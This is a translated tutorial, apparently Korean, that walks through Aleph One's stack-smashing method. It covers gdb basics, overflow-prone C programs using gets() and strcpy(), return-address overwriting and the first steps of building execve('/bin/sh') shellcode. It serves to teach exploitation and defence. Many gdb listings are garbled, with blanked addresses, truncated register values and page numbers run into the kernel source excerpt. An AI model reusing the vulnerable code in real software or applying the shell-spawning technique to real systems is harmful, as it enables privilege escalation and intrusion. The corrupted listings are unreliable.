0x <main>: pushl %ebp /* procedure prolog */
0x <main+1>: movl %esp,%ebp
0x <main+3>: subl $0x4,%esp /* reserve space for the integer variable x */
0x <main+6>: movl $0x0,0xfffffffc(%ebp) /* x=0; */
0x800049d <main+13>: pushl $0x3 /* function(1,2,3); push the parameters */
0x800049f <main+15>: pushl $0x2
0x80004a1 <main+17>: pushl $0x1
0x80004a3 <main+19>: call 0x <function> /* call function() */
0x80004a8 <main+24>: addl $0xc,%esp /* remove the arguments of function(int a, int b, int c) */
0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp) /* x=1; copy 1 to ebp-4 (x) */
0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax /* copy ebp-4 (x) into eax */
0x80004b5 <main+37>: pushl %eax /* push x on the stack */
0x80004b6 <main+38>: pushl $0x80004f8
0x80004bb <main+43>: call 0x <printf> /* call printf() */
0x80004c0 <main+48>: addl $0x8,%esp
0x80004c3 <main+51>: movl %ebp,%esp /* procedure epilog */
0x80004c5 <main+53>: popl %ebp
0x80004c6 <main+54>: ret
0x80004c7 <main+55>: nop

We can see that when function() is called RET will be 0x80004a8, and we want to jump past the assignment at 0x80004ab. The next instruction we want to execute is the one at 0x80004b2. Aleph One gives the distance as 8 bytes and adds 8 to the return address. Note, though, that with the addresses in this listing 0x80004b2 - 0x80004ab = 7 is only the length of the assignment instruction, while the distance from RET is 0x80004b2 - 0x80004a8 = 0xa (10).
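The address arithmetic behind the value added to the return address can be checked mechanically. This is a minimal sketch; skip_distance is a hypothetical helper name, and the addresses used with it are simply the ones printed in the gdb listing above.

```c
#include <stdint.h>

/*
 * Number of bytes that must be added to a saved return address so that
 * execution resumes at target_addr instead of ret_addr.
 */
uint32_t skip_distance(uint32_t ret_addr, uint32_t target_addr)
{
    return target_addr - ret_addr;
}
```

For example, skip_distance(0x80004a8, 0x80004b2) is the distance from RET to the instruction after the assignment, and skip_distance(0x80004ab, 0x80004b2) is the length of the assignment instruction itself. On a different compiler the addresses differ, so the value has to be read from that system's own disassembly.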

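Shell Code

In the previous chapter we saw that an overflow vulnerability can be used to alter the return address so that code of our choosing runs, which changes the program's flow of execution. So what is "the code we want to run"? In most cases it is shellcode that spawns a shell. Once we have a shell, and a root shell in particular, we can do whatever we like. What remains is how to build the shellcode and how to place it at a particular address in the vulnerable program. Put briefly: we put the shellcode we want to run into the buffer we are overflowing, overwrite the return address of the vulnerable program, and make it point at the address of the shellcode inside the buffer. The shell then runs. We come back to this in more detail later.

Now let us see how shellcode is built. Reading Aleph One's paper, one can easily be intimidated by how hard it looks. But the methods for building shellcode have advanced a great deal since his paper, and the kinds of shellcode have multiplied, to the point that they cannot all be covered here. So this article first explains what appears in Aleph One's paper, staying faithful to the original, then applies it unchanged to a recent system to build shellcode, and finally explains a simpler way to build shellcode. Readers who want to know more about the many kinds of shellcode should consult the shellcode articles published in Phrack.

The essential prerequisites for writing shellcode are gdb usage and basic assembly language. At the very least, the instructions used in assembly should be understood thoroughly. We presented the Intel x86 Assembly OPCodes earlier, and that much should be familiar. Before trying to build shellcode, readers should review the assembly instructions once more; this commentary only attaches brief comments.

We said that using gdb is one of the things to know before building shellcode, so let us look at it briefly. For more detail, see the gdb manual. The following is what the author put together earlier on Red Hat 7.1.

We start with the most basic use of GDB. To start GDB, give the "gdb" command at the prompt.

[vangelis@localhost gdb]$ gdb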

GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...

To leave GDB, type "quit" or "q", or press Ctrl-d.

(gdb) quit
[vangelis@localhost gdb]$

Once GDB has been started with the "gdb" command, it is ready to accept commands from the terminal. Various arguments and options can be used to specify more about the debugging environment. The most common way to start GDB is to name an executable program.

[vangelis@localhost gdb]$ gdb program

To debug a running process, give the process ID as the second argument.

[vangelis@localhost gdb]$ gdb program 1234

The available options can be listed with "gdb -h".

[vangelis@localhost gdb]$ gdb -h
This is the GNU debugger. Usage:
    gdb [options] [executable-file [core-file or process-id]]

    gdb [options] --args executable-file [inferior-arguments...]

Options:
  --args             Arguments after executable-file are passed to inferior
  --[no]async        Enable (disable) asynchronous version of CLI
  -b BAUDRATE        Set serial port baud rate used for remote debugging.
  --batch            Exit after processing options.
  --cd=dir           Change current directory to DIR.
  --command=file     Execute GDB commands from FILE.
  --core=corefile    Analyze the core dump COREFILE.
  --pid=pid          Attach to running process PID.
  --dbx              DBX compatibility mode.
  --directory=dir    Search for source files in DIR.
  --epoch            Output information used by epoch emacs-gdb interface.
  --exec=execfile    Use EXECFILE as the executable.
  --fullname         Output information used by emacs-gdb interface.
  --help             Print this message.
  --interpreter=interp
                     Select a specific interpreter / user interface
  --mapped           Use mapped symbol files if supported on this system.
  --nw               Do not use a window interface.
  --nx               Do not read .gdbinit file.
  --quiet            Do not print version number on startup.
  --readnow          Fully read symbol files on first access.
  --se=file          Use FILE as symbol file and executable file.
  --symbols=symfile  Read symbols from SYMFILE.
  --tty=tty          Use TTY for input/output by the program being debugged.
  --version          Print version information and then exit.
  -w                 Use a window interface.
  --write            Set writing into executable and core files.
  --xdb              XDB compatibility mode.

For more information, type "help" from within GDB, or consult the
GDB manual (available as on-line info or a printed manual).
Report bugs to "[email protected]".

Now let us go through the essentials.

To run a program inside GDB, give the r (run) command. As an example, write the following simple program and run it under GDB.

test1.c
#include <stdio.h>

main()
{
    char ch[20];

    printf("Put some words.\n");
    gets(ch);
    printf("%s\n",ch);
}

[vangelis@localhost gdb]$ gdb test1
GNU gdb Red Hat Linux (5.1.90CVS-5)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r
Starting program: /home/vangelis/gdb/test1
Put some words.
Wowhacker!
Wowhacker!

Program exited with code 04.

Next, breakpoints. A breakpoint makes the program stop every time a certain point in the program is reached. For each breakpoint, conditions can be added to control in finer detail whether or not the program should stop. A breakpoint is set with the break command and its argument, which specifies where the program should stop by line number, function name or exact address.

Let us look at setting breakpoints in more detail. Breakpoints are set with the break command or its abbreviation b. There are several ways to say where the breakpoint should go, and we will go through them one at a time.

break function

This sets a breakpoint at the entry to a particular function. Consider the following example, in which main is disassembled first.

(gdb) disass main
Dump of assembler code for function main:
0x <main>: push %ebp
0x <main+1>: mov %esp,%ebp
0x <main+3>: sub $0x28,%esp
0x <main+6>: sub $0xc,%esp
0x <main+9>: push $0x80484e8
0x804844e <main+14>: call 0x <printf>
0x <main+19>: add $0x10,%esp
0x <main+22>: sub $0xc,%esp
0x <main+25>: lea 0xffffffd8(%ebp),%eax
0x804845c <main+28>: push %eax
0x804845d <main+29>: call 0x80482f4 <gets>
0x <main+34>: add $0x10,%esp
0x <main+37>: sub $0x8,%esp
0x <main+40>: lea 0xffffffd8(%ebp),%eax
0x804846b <main+43>: push %eax
0x804846c <main+44>: push $0x80484f9
0x <main+49>: call 0x <printf>
0x <main+54>: add $0x10,%esp
0x <main+57>: leave
0x804847a <main+58>: ret
0x804847b <main+59>: nop
0x804847c <main+60>: nop
0x804847d <main+61>: nop
0x804847e <main+62>: nop
0x804847f <main+63>: nop
End of assembler dump.
(gdb) break printf
Breakpoint 1 at 0x

Here a breakpoint is set on the function printf. Now let us set a breakpoint using an address. When a breakpoint is set on an address, the address is prefixed with "*".

(gdb) b *0x
Breakpoint 1 at 0x

A breakpoint is removed with clear.

(gdb) clear printf
Deleted breakpoint 3

On some operating systems breakpoints cannot be used when some other process is running the program in which the breakpoint is to be set. In that case the message "Cannot insert breakpoints." appears; remove the breakpoint and try again.

There is much more to breakpoints, but we have covered only the essentials. For more detail, consult the GDB manual.

Next is continuing. Continuing means resuming execution of the program until it terminates normally. It is done simply by giving the c (continue) command.

One of the things that makes GDB useful is that we can inspect the contents of the stack and find out the return address of a particular function or the contents of the registers. The usual way to examine data in a program is the 'p' (print) command, or inspect. It prints the value of an expression in the language the program is written in. The form is 'print expr', where expr is an expression in the source language. By default the value of expr is printed in a format appropriate to its data type. To choose a particular format, use the '/f' option, where f specifies the format; that is, the command takes the form 'print /f expr' (or 'p /f expr').

Another way to examine data is the 'x' command. It examines the data in memory at a given address and prints it in a specified format.

Now for the output formats. By default GDB prints a value according to its data type in the program, but that may not be what we want. For example, we may want to print a number in hexadecimal, or a pointer in decimal, or we may need to see the data at some memory address as a string. For this we specify an output format when printing the value. The simplest use of an output format is to say how an already computed value should be printed, which is done by following the print command with a slash and a format letter. The supported formats are as follows.

x - print the integer in hexadecimal
d - print the integer as a signed decimal
u - print the integer as an unsigned decimal
o - print the integer in octal
t - print the integer in binary; t stands for 'two'
a - print as an address; this can be used to find out where in which function an unknown address lies
c - print as a character constant
f - print as a floating-point number

Now let us use the following source from Aleph One to see what each format prints.

t3.c
#include <stdio.h>
#include <string.h>

void function(char *str) {
    char buffer[16];

    strcpy(buffer,str);
}

void main() {
    char large_string[256];
    int i;

    for( i = 0; i < 255; i++)
        large_string[i] = 'A';

    function(large_string);
}

[vangelis@localhost test]# gdb t3
GNU gdb Red Hat Linux (5.1.90CVS-5)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disas main
Dump of assembler code for function main:
0x804841c <main>: push %ebp
0x804841d <main+1>: mov %esp,%ebp
0x804841f <main+3>: sub $0x118,%esp
0x <main+9>: nop
0x <main+10>: movl $0x0,0xfffffef4(%ebp)
0x <main+20>: cmpl $0xfe,0xfffffef4(%ebp)
0x804843a <main+30>: jle 0x <main+36>
0x804843c <main+32>: jmp 0x804845c <main+64>
0x804843e <main+34>: mov %esi,%esi
0x <main+36>: lea 0xfffffef8(%ebp),%eax
0x <main+42>: mov %eax,%edx
0x <main+44>: mov 0xfffffef4(%ebp),%eax
0x804844e <main+50>: movb $0x41,(%eax,%edx,1)
0x <main+54>: lea 0xfffffef4(%ebp),%eax
0x <main+60>: incl (%eax)
0x804845a <main+62>: jmp 0x <main+20>
0x804845c <main+64>: sub $0xc,%esp
0x804845f <main+67>: lea 0xfffffef8(%ebp),%eax
0x <main+73>: push %eax
0x <main+74>: call 0x <function>
0x804846b <main+79>: add $0x10,%esp
0x804846e <main+82>: leave
0x804846f <main+83>: ret
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x
(gdb) r
Starting program: /home/vangelis/test/t3

Breakpoint 1, 0x in main ()
(gdb) x/x function
0x <function>: 0x83e58955

Above, main was disassembled and then the memory at function was examined. A count can also be given after the slash.

(gdb) x/10x function
0x <function>: 0x83e xec8318ec 0x0875ff08 0x50e8458d
0x <function+16>:0xfffedbe8 0x10c483ff 0xf689c3c9 0x81e
0x <main+4>: 0x000118ec 0x85c79000

Dropping the x from 10x in x/10x prints the same values, because hexadecimal is the format in effect by default.

(gdb) x/10 function

0x <function>: 0x83e xec8318ec 0x0875ff08 0x50e8458d
0x <function+16>:0xfffedbe8 0x10c483ff 0xf689c3c9 0x81e
0x <main+4>: 0x000118ec 0x85c79000

Next is info, which is used to get information about the selected frame. The info command is mostly used with the f option, where f stands for frame. Below, info is given the address of a frame. It prints in detail the address of the stack frame, eip, arg (the arguments of the selected frame), the local variables, ebp and so on.

(gdb) info f 0x804841c
Stack frame at 0x804841c:
 eip = 0x0; saved eip 0x118ec
 (FRAMELESS), called by frame at 0x804841c
 Arglist at 0x804841c, args:
 Locals at 0x804841c, Previous frame's sp is 0x0
 Saved registers:
  ebp at 0x804841c, eip at 0x

Next, the name of a function used in the source is given as the argument.

(gdb) info f function
Stack frame at 0x :
 eip = 0x0; saved eip 0xec8318ec
 (FRAMELESS), called by frame at 0x
 Arglist at 0x , args:
 Locals at 0x , Previous frame's sp is 0x0
 Saved registers:
  ebp at 0x , eip at 0x

Next, info is given the address of that same function, and the result is the same as above.

(gdb) info f 0x
Stack frame at 0x :
 eip = 0x0; saved eip 0xec8318ec
 (FRAMELESS), called by frame at 0x
 Arglist at 0x , args:
 Locals at 0x , Previous frame's sp is 0x0
 Saved registers:
  ebp at 0x , eip at 0x

A few more examples.

(gdb) info f main+74
Stack frame at 0x :
 eip = 0x0; saved eip 0x10c483ff
 (FRAMELESS), called by frame at 0x
 Arglist at 0x , args:
 Locals at 0x , Previous frame's sp is 0x0
 Saved registers:
  ebp at 0x , eip at 0x804846a

(gdb) info f 0x
Stack frame at 0x :
 eip = 0x0; saved eip 0x10c483ff
 (FRAMELESS), called by frame at 0x
 Arglist at 0x , args:
 Locals at 0x , Previous frame's sp is 0x0
 Saved registers:
  ebp at 0x , eip at 0x804846a

The following shows the contents of the registers.

(gdb) info reg

eax 0x1 1
ecx 0x42130f
edx 0xbffffb9c
ebx 0x c
esp 0xbffffa10 0xbffffa10
ebp 0xbffffb28 0xbffffb28
esi 0x
edi 0xbffffb
eip 0x x
eflags 0x
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff
fiseg 0x23 35
fioff 0x400568f
foseg 0x2b 43
fooff 0xbffffa
fop 0x77d 1917
xmm0 {f = {0x0, 0x0, 0x0, 0x0}} {f = {0, 0, 0, 0}}
xmm1 {f = {0x0, 0x0, 0x0, 0x0}} {f = {0, 0, 0, 0}}
xmm2 {f = {0x0, 0x0, 0x0, 0x0}} {f = {0, 0, 0, 0}}
xmm3 {f = {0x0, 0x0, 0x0, 0x0}} {f = {0, 0, 0, 0}}
xmm4 {f = {0x0, 0x0, 0x0, 0x0}} {f = {0, 0, 0, 0}}
xmm5 {f = {0x0, 0x0, 0x0, 0x0}} {f = {0, 0, 0, 0}}
xmm6 {f = {0x0, 0x0, 0x0, 0x0}} {f = {0, 0, 0, 0}}

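xmm7 {f = {0x0, 0x0, 0x0, 0x0}} {f = {0, 0, 0, 0}}
mxcsr 0x1f
orig_eax 0xffffffff -1

That covers the basics of using gdb. There is a great deal more, for which the manual should be consulted. Now we turn to the way shellcode is built in Aleph One's paper. The code that spawns a shell is as follows.

shellcode.c
#include <stdio.h>

void main(){
    char *name[2];

    name[0]="/bin/sh";
    name[1]=NULL;
    execve(name[0],name,NULL);
}

Let us compile the source above and see what it does. It has to be compiled with the -static flag; otherwise the actual code for the execve system call is not included in the binary, and there is only a reference to the dynamic C library that would normally be linked in at load time. To repeat, we first quote and explain the material exactly as it appears in Aleph One's paper, then present and explain the results on a recent system, and finally build shellcode in a simpler way. The following is the result given in Aleph One's paper.

[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
[aleph1]$ gdb shellcode
GDB is free software and you are welcome to distribute copies of it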

under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x <main>: pushl %ebp
0x <main+1>: movl %esp,%ebp
0x <main+3>: subl $0x8,%esp
0x <main+6>: movl $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp)
0x <main+20>: pushl $0x0
0x <main+22>: leal 0xfffffff8(%ebp),%eax
0x <main+25>: pushl %eax
0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax
0x800014d <main+29>: pushl %eax
0x800014e <main+30>: call 0x80002bc <__execve>
0x <main+35>: addl $0xc,%esp
0x <main+38>: movl %ebp,%esp
0x <main+40>: popl %ebp
0x <main+41>: ret
End of assembler dump.

Using the gdb output, let us follow what happens in the code that runs the shell. We begin with main().

0x <main>: pushl %ebp
0x <main+1>: movl %esp,%ebp
0x <main+3>: subl $0x8,%esp

As we saw earlier, this part is called the procedure prelude or procedure prolog. Readers who do not follow should reread that earlier part. In short, it saves the previous frame pointer, ebp, then makes the current stack pointer the new frame pointer, and then reserves space for the local variables. It reserves 8 bytes because the local declaration char *name[2] means the two char pointers name[0] and name[1]; a pointer holds the address of a variable, and an address is 4 bytes (1 word), so two pointers need 8 bytes. Note also that in the gdb output some operands are prefixed with $ and some with %. A $ marks an immediate value, and a % marks a register.

0x <main+6>: movl $0x80027b8,0xfffffff8(%ebp)

This copies 0x80027b8, the address of the string "/bin/sh", into name[0], which lives in the space reserved for local variables at 0xfffffff8(%ebp), that is, at ebp-8. It carries out name[0]="/bin/sh"; from the source above.

A brief word on 0xfffffff8(%ebp). It has the form value(register) and denotes the address register + value. As a 32-bit two's complement number 0xfffffff8 is -8, so the address is 8 bytes below ebp, that is ebp-8, and it therefore refers to name[0]. The memory layout of the source above is as follows, and it shows that name[0] is 8 bytes away from ebp.

[ name[0] ][ name[1] ][ ebp ][ ret ]
 ^          ^
 |          |_[ ebp-4 ]
 |_[ ebp-8 ]

Because an address is 4 bytes, name[0] is 8 bytes away from ebp, that is, from sfp.

0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp)

This copies the NULL value 0x0 into name[1], at 0xfffffffc(%ebp), that is, at ebp-4. It carries out name[1]=NULL;. The memory layout diagram just above makes this easy to follow. With the local variables set up, the call to execve() (footnote 17) now begins.

17 The synopsis of execve() is:
#include <unistd.h>
int execve(const char *filename, char *const argv [], char *const envp[]);
execve() executes the program pointed to by filename in the synopsis above; the program must be an executable binary or a shell script. argv is an array of strings passed to the new program as its arguments, and envp is an array of strings passed to the new program as its environment. Both argv and envp must be terminated by a null pointer. See the man page for details.

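0x <main+20>: pushl $0x0

The arguments to execve() are now pushed onto the stack in reverse order, following the stack behaviour we looked at earlier, starting with NULL. For the arguments of execve(), see the synopsis in footnote 17.

0x <main+22>: leal 0xfffffff8(%ebp),%eax

This loads the address of name[], ebp-8 (0xfffffff8(%ebp)), into the eax register. The instruction leal is the same as lea; the trailing l is the AT&T-syntax operand-size suffix for a 32-bit (long) operand. lea is short for load effective address: it computes an effective address offset and loads it into a register. In this form it takes 32-bit operands. lea is provided so that an effective address can be computed without spending repeated work and time on the calculation.

0x <main+25>: pushl %eax

This pushes the address of name[] onto the stack. As we saw in the Intel x86 Assembly OPCodes table earlier, push is a stack instruction.

0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax

This moves the value stored at ebp-8 (0xfffffff8(%ebp)), which is the address of the string "/bin/sh", into the eax register.

0x800014d <main+29>: pushl %eax

This pushes the address of the string "/bin/sh" onto the stack.

0x800014e <main+30>: call 0x80002bc <__execve>

Once the data needed for the call is on the stack, execve() is called. The call instruction also pushes the IP (instruction pointer) onto the stack. As we saw earlier, the IP saved on the stack at this point is called the return address (RET).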
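The displacements that gdb prints in this walkthrough, such as 0xfffffff8 and 0xfffffffc, are easier to read once converted to signed offsets. The following is a minimal sketch of that conversion; disp_to_offset and effective_address are hypothetical helper names chosen for this illustration, and the code only models the arithmetic, it does not touch any real registers.

```c
#include <stdint.h>

/*
 * Interpret a 32-bit displacement as printed by gdb (for example
 * 0xfffffff8) as a signed two's complement offset.
 */
int32_t disp_to_offset(uint32_t disp)
{
    if (disp <= (uint32_t)INT32_MAX)
        return (int32_t)disp;
    /* For values above INT32_MAX, the offset is disp - 2^32. */
    return -(int32_t)(UINT32_MAX - disp) - 1;
}

/*
 * Address denoted by disp(%reg): the register value plus the
 * displacement, wrapping modulo 2^32 as 32-bit hardware does.
 */
uint32_t effective_address(uint32_t reg, uint32_t disp)
{
    return (uint32_t)(reg + disp);
}
```

With these helpers, disp_to_offset(0xfffffff8) is -8 (name[0] at ebp-8) and disp_to_offset(0xfffffffc) is -4 (name[1] at ebp-4).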

Now let us look at execve() itself. To repeat, the system Aleph One used was an Intel-based Linux system. We restate this premise because system calls (footnote 18) differ from one operating system and CPU to another. Some pass arguments on the stack, others in registers. To enter kernel mode some use a software interrupt (footnote 19), others a far call. Linux passes the arguments of a system call in registers and uses a software interrupt to jump into kernel mode. The following is the disassembly of execve().

(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
0x80002c0 <__execve+4>: movl $0xb,%eax
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
0x80002ce <__execve+18>: int $0x80
0x80002d0 <__execve+20>: movl %eax,%edx
0x80002d2 <__execve+22>: testl %edx,%edx
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
0x80002d6 <__execve+26>: negl %edx
0x80002d8 <__execve+28>: pushl %edx
0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>: popl %edx
0x80002df <__execve+35>: movl %edx,(%eax)
0x80002e1 <__execve+37>: movl $0xffffffff,%eax
0x80002e6 <__execve+42>: popl %ebx
0x80002e7 <__execve+43>: movl %ebp,%esp
0x80002e9 <__execve+45>: popl %ebp
0x80002ea <__execve+46>: ret
0x80002eb <__execve+47>: nop
End of assembler dump.

18 System calls are also called primitives; they are low-level functions that reside in the kernel and provide the basic facilities for controlling the system. On Linux, int 0x80 is normally used to enter kernel mode for a system call. When it is executed, interrupt 0x80 is raised.

19 On interrupts, see the article "Handling Interrupt Descriptor Table for fun and profit" published in Phrack 59. The O'Reilly book Understanding the Linux Kernel defines an interrupt as "an event that alters the sequence of instructions executed by a processor". Interrupts are also explained in some detail in the book 리눅스 매니아를 위한 커널 프로그래밍 (Kernel Programming for Linux Enthusiasts; 조유근 and two co-authors, 교학사).
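The register convention visible in the disassembly above (system call number in eax, the three arguments in ebx, ecx and edx, then int $0x80) can be modelled in a few lines. This is only an illustrative sketch: struct syscall_regs and execve_regs are hypothetical names, not part of any kernel or libc interface, and nothing here actually issues a system call.

```c
#include <stdint.h>

/* Model of the four registers loaded before int $0x80 on i386 Linux. */
struct syscall_regs {
    uint32_t eax;   /* system call number */
    uint32_t ebx;   /* first argument     */
    uint32_t ecx;   /* second argument    */
    uint32_t edx;   /* third argument     */
};

/*
 * Fill the registers the way the execve wrapper above does:
 * 0xb (11) selects execve, followed by filename, argv and envp.
 */
struct syscall_regs execve_regs(uint32_t filename, uint32_t argv, uint32_t envp)
{
    struct syscall_regs r;

    r.eax = 0xb;        /* movl $0xb,%eax        */
    r.ebx = filename;   /* movl 0x8(%ebp),%ebx   */
    r.ecx = argv;       /* movl 0xc(%ebp),%ecx   */
    r.edx = envp;       /* movl 0x10(%ebp),%edx  */
    return r;
}
```

Passing 0x80027b8 (the address of "/bin/sh" in Aleph One's listing) as filename and 0 as envp gives the register state the wrapper sets up for shellcode.c; the argv value is whatever address name[] has on the system in question.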

Let us look at the result above in detail.

0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx

By now it should be easy to recognise this as the procedure prolog.

0x80002c0 <__execve+4>: movl $0xb,%eax

This copies 11 (0xb in hexadecimal) into the eax register. The eax register is used to pass data to a procedure and to return data from the procedure to the calling code. The value passed here, 0xb, refers to execve in the Linux syscall table. The Linux syscall table can be thought of as the list of system calls of the Linux kernel; it can also be regarded as the API that forms the interface between user space and kernel space. The syscall numbers are listed in detail in /usr/src/linux-<version>/arch/i386/kernel/entry.S. Only part of entry.S is excerpted here; readers should check the whole file on their own systems. In the file contents below, the part marked in blue is the entry for execve.

/*
 * linux/arch/i386/entry.S
 *
 * Copyright (C) 1991, 1992 Linus Torvalds
 */

/*
 * entry.S contains the system-call and fault low-level handling routines.
 * This also contains the timer-interrupt handler, as well as all interrupts
 * and faults that can result in a task-switch.
 *
 * NOTE: This code handles signal-recognition, which happens every time

 * after a timer-interrupt and after each system call.
 *
 * I changed all the .align's to 4 (16 byte alignment), as that's faster
 * on a 486.
 *
 * Stack layout in 'ret_from_system_call':
 *   ptrace needs to have all regs on the stack.
 *   if the order here is changed, it needs to be
 *   updated in fork.c:copy_process, signal.c:do_signal,
 *   ptrace.c and ptrace.h
 *
 *    0(%esp) - %ebx
 *    4(%esp) - %ecx
 *    8(%esp) - %edx
 *    C(%esp) - %esi
 *   10(%esp) - %edi
 *   14(%esp) - %ebp
 *   18(%esp) - %eax
 *   1C(%esp) - %ds
 *   20(%esp) - %es
 *   24(%esp) - orig_eax
 *   28(%esp) - %eip
 *   2C(%esp) - %cs
 *   30(%esp) - %eflags
 *   34(%esp) - %oldesp
 *   38(%esp) - %oldss
 *
 * "current" is in register %ebx during any slow entries.
 */

#include <linux/config.h>
#include <linux/sys.h>

70 #include <linux/linkage.h> #include <asm/segment.h> #include <asm/smp.h> EBX = 0x00 ECX = 0x04 EDX = 0x08 ESI = 0x0C EDI = 0x10 EBP = 0x14 EAX = 0x18 DS = 0x1C ES = 0x20 ORIG_EAX = 0x24 EIP = 0x28 CS = 0x2C EFLAGS = 0x30 OLDESP = 0x34 OLDSS = 0x38 CF_MASK = 0x IF_MASK = 0x NT_MASK = 0x VM_MASK = 0x /* * these are offsets into the task-struct. */ state = 0 flags = 4 sigpending = 8 addr_limit = 12 exec_domain = 16 need_resched = 20 69

71 tsk_ptrace = 24 cpu = 32 ENOSYS = 38 #define SAVE_ALL cld; pushl %es; pushl %ds; pushl %eax; pushl %ebp; pushl %edi; pushl %esi; pushl %edx; pushl %ecx; pushl %ebx; movl $( KERNEL_DS),%edx; movl %edx,%ds; movl %edx,%es; -- 중략 --.data ENTRY(sys_call_table).long SYMBOL_NAME(sys_ni_syscall) /* 0 - old "setup()" system call*/.long SYMBOL_NAME(sys_exit).long SYMBOL_NAME(sys_fork).long SYMBOL_NAME(sys_read).long SYMBOL_NAME(sys_write).long SYMBOL_NAME(sys_open) /* 5 */.long SYMBOL_NAME(sys_close).long SYMBOL_NAME(sys_waitpid).long SYMBOL_NAME(sys_creat) 70

72 .long SYMBOL_NAME(sys_link).long SYMBOL_NAME(sys_unlink) /* 10 */.long SYMBOL_NAME(sys_execve) /* 11 */.long SYMBOL_NAME(sys_chdir).long SYMBOL_NAME(sys_time).long SYMBOL_NAME(sys_mknod).long SYMBOL_NAME(sys_chmod) /* 15 */.long SYMBOL_NAME(sys_lchown16).long SYMBOL_NAME(sys_ni_syscall) /* old break syscall holder */.long SYMBOL_NAME(sys_stat).long SYMBOL_NAME(sys_lseek).long SYMBOL_NAME(sys_getpid) /* 20 */.long SYMBOL_NAME(sys_mount).long SYMBOL_NAME(sys_oldumount).long SYMBOL_NAME(sys_setuid16).long SYMBOL_NAME(sys_getuid16).long SYMBOL_NAME(sys_stime) /* 25 */.long SYMBOL_NAME(sys_ptrace).long SYMBOL_NAME(sys_alarm).long SYMBOL_NAME(sys_fstat).long SYMBOL_NAME(sys_pause).long SYMBOL_NAME(sys_utime) /* 30 */ -- 중략 --.long SYMBOL_NAME(sys_chown).long SYMBOL_NAME(sys_setuid).long SYMBOL_NAME(sys_setgid).long SYMBOL_NAME(sys_setfsuid) /* 215 */.long SYMBOL_NAME(sys_setfsgid).long SYMBOL_NAME(sys_pivot_root) 71

73 .long SYMBOL_NAME(sys_mincore).long SYMBOL_NAME(sys_madvise).long SYMBOL_NAME(sys_getdents64) /* 220 */.long SYMBOL_NAME(sys_fcntl64) #ifdef CONFIG_TUX.long SYMBOL_NAME( sys_tux) #else # ifdef CONFIG_TUX_MODULE.long SYMBOL_NAME(sys_tux) # else.long SYMBOL_NAME(sys_ni_syscall) # endif #endif.long SYMBOL_NAME(sys_ni_syscall) /* Reserved for Security */.long SYMBOL_NAME(sys_gettid).long SYMBOL_NAME(sys_readahead) /* 225 */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for setxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for lsetxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for fsetxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for getxattr */.long SYMBOL_NAME(sys_ni_syscall) /* 230 reserved for lgetxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for fgetxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for listxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for llistxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for flistxattr */.long SYMBOL_NAME(sys_ni_syscall) /* 235 reserved for removexattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for lremovexattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for fremovexattr */.long SYMBOL_NAME(sys_tkill).rept NR_syscalls-(.-sys_call_table)/4.long SYMBOL_NAME(sys_ni_syscall) 72

